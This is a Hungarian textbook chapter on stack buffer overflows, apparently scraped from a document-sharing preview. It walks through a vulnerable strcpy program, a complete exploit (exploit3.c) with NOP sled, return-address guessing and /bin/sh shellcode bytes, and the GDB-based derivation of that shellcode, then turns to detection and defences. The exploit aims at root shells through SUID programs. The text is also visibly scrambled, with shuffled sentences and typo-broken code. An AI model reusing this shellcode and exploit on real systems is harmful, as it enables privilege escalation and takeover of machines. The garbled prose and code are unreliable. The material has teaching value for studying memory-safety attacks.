amíg az megtelik. amelyek a roothoz tartoznak.1 Hogyan lehet ezt kihasználni? Ha a támadó Buffer-Overflow-val akar lefagyasztani egy programot. úgynevezett kizsákmányoló (exploit) kód van. amit ott találnak. Forráskódokkal mutatjuk meg. Ennek a következő a háttere: egyes funkciók. és végül a program hibás működését. Azonban bizonyos bevitelekkel még végre lehet hajtatni egy kódot az instabil rendszeren. hanem más változókhoz tartozik. A shell-kód értelme és célja. s hogyan lehet célzottan megváltoztatni a függvény visszatérési pontjának a címét. . mint a raw sockets vagy bizonyos rendszererőforrások elérése. Ha minden felhasználó root-jogokkal tud programokat futtatni. Ez természetesen hibákat eredményez. ami root-jogokkal fut. de minden felhasználó elindíthatja. i++) { large_string[i] = 'A'. hogy miért kell egyáltalán root-jogokkal futniuk a programoknak. hogyan nem íródnak felül válogatás nélküli tetszőleges programrészek. //egy ciklus.2. Ez főleg a SUID-programoknál érdekes. holott csak 16 bájtra volna lehetőség. csak hogy megszerezzék a nekik szükséges helyet. hiszen rootként futó eljárások csak olyanok lehetnek. 11. amikor a program egy eljárásból vagy függvényből visszatér. Ez egy SUID bitet helyez el.2. akkor csak annyit kell tennie. hogy ez fusson a főprogram helyett. természetesen megnő a lehetséges hibaforrások száma. amely a tulajdonképpeni hibát okozza void Overflow(char *string) { //A puffer kisebb. hogy egy shellt hozzon létre.2 Hogyan működik? Shell-kód alatt olyan assembler-kódot értünk.adatmennyiség kilóg a pufferből egy olyan területre.és Shellscript-ismeretekre van szükség . Ezzel át lehet venni az ellenőrzést a számítógép felett. amelyek már bootoláskor elindulnak. amely már nem ehhez a pufferhez. hogy addig ír a pufferba. a tulajdonképpeni Buffer-Overflow-t. amely A-kkal tölti ki a memóriaterületet for(i = 0. A továbbiak megértéséhez alapos assembler. A biztos eredmény: memóriavédelmi hiba és a program összeomlása. hogy egy shellt (parancssort) nyissanak root-jogokkal a rendszeren. hogy a program a tulajdonos és nem a felhasználó jogaival fut. Sok. és . amelyek arra valók. A ping egy jó példa az olyan programra. az lefagy. Világos. Ha a támadó kapcsolatot épít fel a hosttal. hogy egy Buffer-Overflow segítségével „megörököljenek" egy root-jogokkal rendelkező shellt. GDB=GNU Debugger) futtatásához még Linux is kell. } 11. végül rátesz még egy lapáttal. Eközben az adatok mindent felülírnak. amit átadtak charTolittle[16] //megpróbálja 256 bájttal teleírni a puffért. amely arra kényszeríti a programot. például az 1024 alatti portoké vagy eszközöké. //ezért az utána elhelyezkedő terület felülíródik strcpy(ToLittle. mint a ToGreat változó. ami azt jelenti. Itt a támadók különösen abban érdekeltek. OverFlow (To Great) } //Most jön a függvény. és egy hosszú karakterláncot küld egy meghatározott programnak. i < 255. Talán felmerül a kérdés. string). Egy példa az ilyen kódra: voidman( ) { //a ToGreat változót 256 bájttal inicializálja char ToGreat[256] //ciklusváltozó int i.különben nem fog menni. A kivitelezéshez szükséges programok (GCC=GNU C Compiler. hogy egy ilyen program biztonsági kockázatot jelenthet. root-jogokat követel meg.

int i.4).Magyarázatképpen egy forráskód: exploit3. if (!(buff=malloc(bsize))) { printf("Can't allocate memory. a pointer minden alkalommal egy bájttal tovább mutat. Ez a kód még nincs kész. addr. . hogy kevesebb számot használunk. Pointer a ptr címére for (i = 0. Az „Offset" értéke 0 0 512 0x90 printf("Using address: 0x%x\n". Egy valódi exploitnál ez többnyire több mint 100 . \n"). mert még nem ismerjük a shellkód helyét a memóriában. hogy a kód. ptr = buff+ ((bsize/2) . i < strlen(shellcode). A NOP-kódokat a pufferméret feléig írjuk a memóriába. hogy a NOP-kód csak a Ox90-es Intel CPU-kon fut. Most elhelyezzük az endbyte-ot. buff[bsize -1]= '\0'. if (argc > 2) offset = atoi(argv[2]). Kiírja a „Using address: 0x%x\n" -t és az „addr" értékét. i++) *(ptr++) = shellcode[i]. i++) buff[i] = NOP. cbar shettcode[ ] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\ xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\ x40\xcd" "\x80\xe8\xdc\xff\xff\xff\bin/sh". bsize=DEFAULT_BUFFER_SIZE. i < bsize/2. i+=4) *(addr_ptr++) = addr. exit(0). olvashatóbbá váljon. int offset=DEFAULT_OFFSET. a többi assembler. ptr = buff.(strlen(shellcode)/2)). mint a „DEFAULT_OFFSET". for (i = 0. for(i = 0. A változókhoz értéket rendel if (argc > 1) bsize = atoi(argv[1]). Ezért nagyon pontosan meg kell becsülni. putenv(buff). a Shellcode csak a „bin/sh". } A „get_sp" változó feltöltése assembler-kóddal} mid main(int argc. i < bsize. Pointer az „addr-ptr" helyére. } memcpy(buff.offset. hogy növeljék a találat esélyeit. dhar *argv[ ]) { char *buff. Beírjuk a shellkódokat a memóriába. *ptr.1000 NOP kód. Természetesen a támadók több NOP-kódot is beépítenek."EGG=". } Olyan fogalmakkal lehet dolgozni. system("/bin/bash "). azáltal. A Shellcode változóhoz egy értéket rendelünk. unsigned long get_sp(void) { asm("movl%esp.%eax"). mert az addr-ptr címét minden cikluslefutással növeljük. Fontos még megemlíteni.c #include #define DEFAULT_OFFSET #DEFAULT_BUFFER_SIZE #defineNOP addr = get_sp( ) . A „ptr" megfelel a „bufF"-nak addr_ptr = (long *) ptr. addr). long *addr:ptr. hogy eltaláljuk a megfelelőt.

3 Minek kell a Shellcode változónál állnia? Most már mindenképpen segítségül kell hívni egy GDB-t! shellcode. elindítjuk.%esp 0x8000136: movl $0x80027b8.%esp 0x8000158: popl %ebp 0x8000159: ret End of assembler dump.0xfffffff(%ebp) 0x800013d: movl $0x0.%esp 0x8000156: movl %ebp.11. és másolatot is lehet róla készíteni! (gdb) disassemble main Dump of assembler code for function main: 0x8000130: pushl %ebp 0x8000131: movl %esp.c Most elindítjuk a GDB-t: gdb shellcode A GDB ingyenes szoftver. hogyan néz ki a forráskód assemblerben.0xfffffffc(%ebp) 0x8000144: pushl $0x0 0x8000146 leal 0xfffffff8(%ebp). NLL).%eax 0x80002e6 <__execve+42>: popl %ebx 0x80002e7 <__execve+43>: movl %ebp. Hogy ezt megértsük. amely szabad helyet készít a helyi változóknak.%edx 0x80002ce <__execve+18>: int $0x80 0x80002d0 <__execve+20>: movl %eax. és GDB-vel elemezzük.%ebp 0x8000133: subl $0x8.2. és egy új frame-pointert állítunk elő. %esp 0x80002e9 <__execve+45>: popl %ebp 0x80002ea <__execve+46>: ret 0x80002eb <__execve+47>: nop End of assembler dump.%edx 0x80002d4 <__execve+24>: jnl 0x80002e6 <_execve+42> 0x80002d6 <__execve+26>: negl %edx 0x80002d8 <__execve+28>: pushl %edx 0x80002d9 <__execve+29>: call 0x80001a34<__normal_errno_location> 0x80002de <__execve+34>: popl %edx 0x80002df <__execve+35>: movl %edx.c #include void main( ) { char *name[2].%esp Ez volt az eljárás kezdete. először a „main"-t analizáljuk: 0x8000130: 0x8000131: 0x8000133: pushl movl subl %ebp %esp. Ebben az esetben: .%eax 0x8000149: pushl %eax 0x800014a: movl 0xfffffff8(%ebp).%ecx 0x80002cb <__execve+15>: movl 0x10(%ebp). %ebp 0x80002bf <__execve+3>: pushl %ebx 0x80002c0 <__execve+4>: movl $0xb.%eax 0x80002c5 <__execve+9>: movl 0x8(%ebp). execve(name[0]. name. (gdb) disassemble __execve Dump of assembler code for function __execve: 0x80002bc <__execve>: pushl %ebp 0x80002bd <__execve+l>: movl %esp. A régi frame-pointert mentjük.%edx 0x80002d2 <__execve+22>: movl %edx. name[0] = "/bin/sh".%ebx 0x80002c8 <__execve+12>: movl 0xc(%ebp). name[1] = NULL.%ebp $0x8. A parancs így néz ki: gcc -o shellcode -ggdb -static shellcode.%eax 0x800014d: pushl %eax 0x800014e: call 0x8002bc <__execve> 0x8000153: addl $0xc.(%eax) 0x80002e1 <__execve+37>: movl $0xfffffffc. Ehhez először a GCC-vel kell compilerelni a programot. } Hogy megnézzük.

Az execve( ) meghívása itt kezdődik. A Null pointer címét az EDX-be másoljuk. Az execve( ) library eljárás meghívása. Ez ugyanazt jelenti mint: name[0]="/bin/sh". 0x8000146: leal 0xfffffff8(%ebp).%edx $0x80 A 0xb-t a stackbe másoljuk. 11 az execve. De mi történik. 0x8000136: Az eljárás kezdete movl $0x80027b8. ha félresikerül? A program végeérhetetlenül tovább hozná az értékeket a stackből. %eax 0x8002bc <__execve> Beírjuk a stackbe a "/bin/sh" sztring címét.c #include void main( ) { exit(0). (gdb) disassemble_exit Dump of assembler code for function _exit: 0x800034c <_exit>: pushl %ebp 0x800034d <_exit+1>: movl %esp.0xfffffff(%ebp) 0x80002c0 <__execve+4>: movl 0x80002c5 <__execve+9>: movl 0x80002c8 <__execve+12>: movl 0x80002cb <__execve+15>: movl 0x80002ce <__execve+18>: int $0xb. A name [ ] címét bemásoljuk az ECX-be. 0x8000144: pushl $0x0 Az execve( ) argumentumait fordított sorrendben helyezzük (push) a stackbe. 0x800013d: movl $0x0.%eax 0x8(%ebp).%ebp A 0x80027b8 értéket (a .char *name[2].%ecx 0x10(%ebp). A támadó egy ilyen programot természetesen megpróbál tisztán programozni. hogy hozzáfűz egy exit syscall-t: exit. Ezt úgy tudja elérni./bin/sh" címe) bemásoljuk az első pointer of name[ ] -be. Nem valami finom dolog. Kernel módra váltunk. Most execve( ).. amelyek azután más értékeket tartalmazhatnának.. Ez ugyanazt jelenti mint: name[1] = NULL. movl Betöltjük a "/bin/sh" sztring címét az EAX regiszterbe. %ebp pushl %ebx . Beírja az instruction pointert a stackbe. A "/bin/sh" címét bemásoljuk az EBX-be.c gdb exit (no debugging symbols found). Tulajdonképpen ez minden az execve( ) meghívásáról. 0x8000149: 0x800014a: 0x800014d: 0x800014e: pushl call pushl %eax 0xfffffff8(%ebp). } gcc -o exit -static exit.0xfffffffc(%ebp) A 0x0 (NULL) értéket a második pointer of name[ ] -be másoljuk.%eax Beírjuk a name[ ] címét a stackbe. Minden folyamat az operációs rendszertől függ. Ez az index a syscall-táblában.%eax Betöltjük a name[ ] címét az EAX regiszterbe.%ebx 0xc(%ebp). 0x80002bc <__execve>: 0x80002bd <__execve+1>: movl 0x80002bf <__execve+3>: pushl %ebp %esp. NULL-ával kezdünk.

%ebx movl %ebp.nullbyteoffset(%esi) movl $0x0. %ebx leal array-offset. ez az exit kód. mikor a hívás lefutott. (%esi).array-offset(%esi) # movb $0x0. %eax movl $0x0. A legtöbb program 0-t ad vissza. könnyítésképpen bizonyos parancsokat lehet használni.%eax movl 0x8(%ebp). természetesen a sztring címét és az endbyte nullát a tömb mögé tesszük. hogy pontosan hova kerül a memóriában az exploit kódunk. Összefűzve ez a következőképpen néz ki: Elhelyezzük a sztringet a kód mögött.0x800034f <_exit+3>: 0x8000350 <_exit+4>: 0x8000355 <_exit+9>: 0x8000358 <_exit+12>: 0x800035a <_exit+14>: 0x800035d <_exit+ll>: 0x800035f <_exit+19>: 0x8000360 <_exit+20>: 0x8000361 <_exit+21>: 0x8000362 <_exit+22>: 0x8000363 <_exit+23>: End of assembler dump.null-offset(%esi) movl $0xb.%ebx int $0+80 movl 0xfffffffc(%ebp). amelyekkel relatív címeket kapunk. pushl %ebx movl $01. %eax movl $0x0. a sztringcím lesz visszatérési címként megadva. Mivel soha nem tudjuk pontosan. movl %esÍ. # 2 bytes # 1 byte 3 bytes # 4 bytes # 7 bytes # 5 bytes # 2 bytes # 3 bytes # 3 bytes # 2 bytes # 5 bytes # 5 bytes # 2 bytes # 5 bytes . és ezután kell végrehajtani az „int 0x80"-at. és a C a Call helyett áll. %ebx int $0x80 /bin/sh string goes here. ha nem volt hiba.%eax movl %esi. Ha a „/bin/sh" sztring elé egy Call parancsot teA programkód a módosításokat követően jmp offset-to-call popl %esi . A programfutás a következőképpen néz ki: Az Exit syscall-t a 0xl-re helyezzük az EAX-ben.string_addr_addr movb $0x0. %edx int $0x80 movl $0x1.null_addr movl $0xb. Most már csak annyit kell tenni. és a Call parancshoz egy Jump parancsot. Jump-pal és Call-lal olyan parancsokat lehet használni. %eax movl string_addr. %ebx int $0x80 call offset-to-popl /bin/sh string goes here. A J itt a Jump. movl string_addr.%ecx leal null_string. %esp popl %ebp ret nop nop nop szünk. %ebx leal string_addr.%edx int $0x80 movl $0x1. %ecx leal null-offiet(%esi).null_byte_addr movl $0x0. hogy a visszatérési címet bemásoljuk a regiszterbe.

amelyhez a vége után is hozzá tudunk írni. a sztringcímről tömbre és a sztringcímet nullára számoljuk át. Ezért a kódot.3 Áldozat a Buffer-Overflow-kért Ezekhez a támadásokhoz tehát egy pufferra van szükség. akkor nincs gond. A könyvtárfüggvények tartalmazta parancsok. logikus. s a programozók sem nagyon védik ettől a programjaikat. 11. Ha egy bevitel ellenőrzés nélkül. mekkora a rendelkezésre . A parancsok egyszerűen egy null-karakterig (\0) olvasnak. ezért ritkábban is találkozni az előbbiekkel. ami természetesen egy fatális programozási hiba. és ismét a GDB-t használni. az ismert bizonytalansági faktorokra. Hogy kiderüljön. Az ilyen funkciókat a forráskódban a legegyszerűbb megkeresni. és ezután a transzferkontrollt kell használni. ami pl. és azután teszteljük.4 Honnan lehet felismerni a Buffer-Overflow-t? Szerencsére sok lehetőség van a Buffer-Overflow-k felismerésére.%edx int $0x80 movl $0x1. Ilyenkor többnyire a sztringhosszúságot figyeljük az átadási pontokon. A hiba azonban többnyire nem a programozón múlik. %ebx leal 0x8(%esi). Sok operációs rendszer ezt megint csak nem engedi meg. Linuxprogramoknál szabadon hozzáférhető. és hibákat keresünk. Ha nincs ilyen lehetőség (nincs meg a forráskód). egy null-terminálással megjelölt program végéig. de nem a Heap-based Overflow-któl. neki elég néhány könyvtárfunkciót használnia.Ha az offseteket Jump-ról Call-ra. Hozzáértő hackereknek tehát ez egy egészen különleges támadási pont! A gond az. %ebx int $0x80 call 0x2b string \"/bin/sh\" # 2 bytes # l byte # 3 bytes # 4 bytes # l bytes # 5 bytes # 2 bytes # 3 bytes # 3 bytes # 2 bytes # 5 bytes # 5 bytes # 2 bytes # 5 bytes #8 bytes álló puffer. Itt szisztematikusan ellenőrizni kell a paraméter-átadásokat és az egyes funkciókat (a DLL-eket és a library-ket). Először azonban a bináris kód hexmegjelenítéséhez kell jutnunk. ami attól függ. a sprintf( ). akkor lehet mindent compilerelni. a kódot egy globális tömbbe helyezzük a fájlszegmensben. A sztring azonban lehet túl hosszú. ezt kapjuk: jmp 0x26 popl %esi jnovl %esi. Ez persze véd a Stack Overflow-któl. Lényegében a dinamikus hozzárendelés sem sokkal biztonságosabb.0xc(%esi) movl $0xb. Mik azok a Heap-based Overflow-k? Heap-based Overflow-kat sokkal nehezebb előállítani. A programozók úgy gondolják. a vprintf( ). íme. 11. A másik eljárás arra. hogy túl lehet tölteni a puffért. hanem helyette malloc( ) -ot használnak. amelyet futtatunk. először a compilerrel lefordítjuk. Call-ról Popl-ra. egy kis példa: void tulcsordul(char argvFG) { char BuffertoLittle [4]. Ha olyan programról van szó. hogy soha nem statikus puffereket. hogy egy puffért bevitelekkel megtöltsünk. ezzel minden veszélytől védve vannak. közvetlenül a Strcpy-val kerül használatba. a strcat( ). egy fájlszegmensbe vagy stackbe kell csomagolni. De van egy probléma! Ez a kód sajátosan változik. egy ciklus. Hogy ezt elérjük. működik-e a kód. a strcpy( ) és a scanf( ) nem figyelnek arra.0x7 (%esi) movl $0x0.%ecx leal 0xc(%esi).%eax movl %esi. %eax movl $0x0. amelynek megvan a forráskódja. és máris jelentkeznek ezek a problémák. a user interfészen keresztül lehet váratlan bevitelekkel tesztelni a programot. mint a Stack Overflow-kat. amely elolvas és a pufferbe ír egyes karaktereket. hogy mi áll hozzá a rendelkezésünkre. Ha ez kész. a gets( ).0x8(%esi) movb $0x0. és a \0 jóval a puffer vége után is elhelyezkedhet.

hogy egy rootshell-hez jusson egy másik Linux-gépen.if (strlen(argv) > 7) { cout« "Rossz: a puffer túl fog csordulni\n". Ez akkor segíthet. honnan jönnek az adatok. noexec_user_heap). } 11. Itt nem a forráskód a fontos. hogy a „heap"-ben és a „stack"-ben programok futhassanak (noexec_user_stack. annál nehezebb lesz a támadás. „PZK" túlfut */ } int main(int argc. hogy az összedöntí a programot. Honnan ismerünk fel egy Buffer-Overflow-támadást? A Buffer-Overflow-támadásokat nagyon nehéz felfedezni. A SecureLINUX-nál egy patch-re van szükség ehhez. illetve védhetnek bizonyos mértékig e támadások ellen. ha a felhasználói privilégiumokat nem használják ki túlságosan. nincsenek veszélyben. tulcsordul(argv[1]). Így már a hálózat felügyeletével is fel lehet ismerni.5 Milyen védelmi mechanizmusok vannak? Tulajdonképpen csak egy Linux-verzió. A felderítés egyik lehetősége lenne a szerver lekapcsolása. A Solaris 2. Így a fenti példa szerinti Buffer-Overflow természetesen nem sikerülhet. vagy váratlan karakterekkel feltölteni. és az egész Linuxot kompletten át lehet írni. Különösen. Ezért érvényes a régi szabály: „Minél jobban eltérsz a szabványosított megnevezésektől. vagyis manuálisan. hogyan lehet paraméterekkel és más átadásokkal (ezek más helyeken is történhetnek) szándékosan lefagyasztani programokat. Ezt indítja el az exploiton keresztül is. hanem egy manuálisan előidézett BufferOverflow demonstrálása. Itt az átadandó paraméternek olyan a hossza. char *argv[ ]) { cout« "Az átadandó paraméter hossza:" « strlen (argvF1G) « "\n". A névadási kényszer miatt ez a variáció szinte mindig sikeres. Ha ez megtörténik. és a reakcióra várni. Megmutatja." A demonstráláshoz egyszerűen le kellene fordítani ezt a programot. ha egyszer már megleptek. Egy programot lehet pl. mielőtt a hacker törölhetné a nyomait a logfájlokból. disassemblálni. bevitelekkel tesztelni a Buffer-Overflow lehetőségeket. hajtsd végre\n". akkor a Netcattel egyenként lehet ellenőrizni a parancsokat a Buffer-Overflow-ra. a „root"-ot lehet egyszerűen így nevezni: „HAHA". De felhasználóként vagy rendszergazdaként megvan még az a lehetőségünk is. strcpy(BuffertoLittel. A hacker célja mindig az. pl. és a következőképpen elindítani: „Név 052698541". } eke { cout « "Bevitel OK. úgy kell ezt */ /* csinálni. amelynél a parancsokat és a szintaxist is meg lehet tudni.6+ nál a „normál" telepítés után aktiválni lehet egy kapcsolót. mint azt a programozó várta. ha minden program forráskódja megvan. strcpy(BuffertoLittle. és egy speciális compilerrel minden programot újra kell fordítani. és utána végrehajtani vagy */ /* mindjárt biztonságos függvényeket használni */ Természetesen más módszerek is vannak. hogy a shellneveket és az /etc/passwd-fájlt megfelelően megváltoztassuk. argv). mert a beírás hosszabb volt. argv). ami megakadályozza. Ha egy kifelé nyitott hálózati szolgáltatóról van szó. /*Rossz: Ha argc[ ] túl nagy. . Ahogy az előbbiekben. először ellenőrizni. A standard kernelt kell megváltoztatni. és részletről részletre átvizsgálni.6+ védenek. itt is szándékosan túl hosszú beviteleket kell csinálni. } /* Helyes: ahogy a felső részben. a támadó többé nem tud mit kezdeni ezzel a számítógéppel. Ezáltal a Solarissal kapott programok. a SecureLINUX és a Solaris 2.

2 A Buffer-Overflow-k és a tűzfalak Egy tűzfallal természetesen csökkenteni lehet a Buffer-Overfíowtámadások lehetőségét. és csökken annak a kockázata. router. Így a tapasztalatlan támadóknak aligha van esélyük. HTTP-szerver vagy adatbázis szerverként működik. . illetve a belső interfészek megtámadását. nem fognak bennük kiindulási pontot találni Buffer-Overflow-khoz. A tűzfal megnehezíti a külső. Mivel a tűzfalak szinte mindig viszonylag kicsik.5. Teljes biztonságban azonban sohasem érezhetjük magunkat. Ezáltal a támadót vissza lehet fordítani az assembler-kód irányába. pl.11. Konfliktusok abból adódhatnak.5. hogy egy készre fordított exploit jelenik meg az interneten. Ezek nagy biztonsági kockázatot jelentenek.1 Összefüggés a CPU és a Buffer-Overflow között Manapság sok szervert működtetnek a kereskedelemben nem szokásos CPU-kkal. 11. ha a szervernek még más feladatokat is el kell látnia. proxy. e-mail gateway.

You're Reading a Free Preview

Download
scribd
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->